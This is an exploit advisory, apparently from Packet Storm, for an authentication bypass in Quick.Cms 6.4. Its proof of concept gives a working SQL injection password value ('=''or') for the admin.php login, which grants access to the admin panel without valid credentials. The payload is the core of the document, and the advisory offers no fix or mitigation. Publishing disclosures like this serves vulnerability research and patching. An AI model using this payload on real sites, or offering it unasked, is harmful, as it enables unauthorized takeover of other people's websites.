Quick CMS 6.4 SQL Injection / Authentication Bypass

2017-10-14T00:00:00
ID PACKETSTORM:144618
Type packetstorm
Reporter M.R.S.L.Y
Modified 2017-10-14T00:00:00

Description

                                        
                                            ` ___________________________________________________  
|  
| Exploit Title: Quick.Cms_v6.4 Autentication Bypass Vulnerability  
| Exploit Author: Ashiyane Digital security Team (M.R.S.L.Y)  
| Vendor Homepage: http://opensolution.org  
| Software Link:  
http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.4-en.zip  
| Version: Quick.Cms_v6.4  
| Date: 2017-10-14  
| Category: webapps  
| Tested on: Kali-Linux /FireFox  
| CVE: N/A  
| Dork: N/A  
|__________________________________________________  
  
The vulnerability is in the login area of Quick.Cms_v6.4,  
where we can enter the panel only using some parameters such as  
password  
__________________________________________________  
  
Proof of Concept :  
  
http://127.0.0.1/PATH/admin.php => User: attacker@gmail.com Pass:  
'=''or'  
  
__________________________________________________  
  
Discovered By : Ashiyane Digital security Team  
__________________________________________________  
`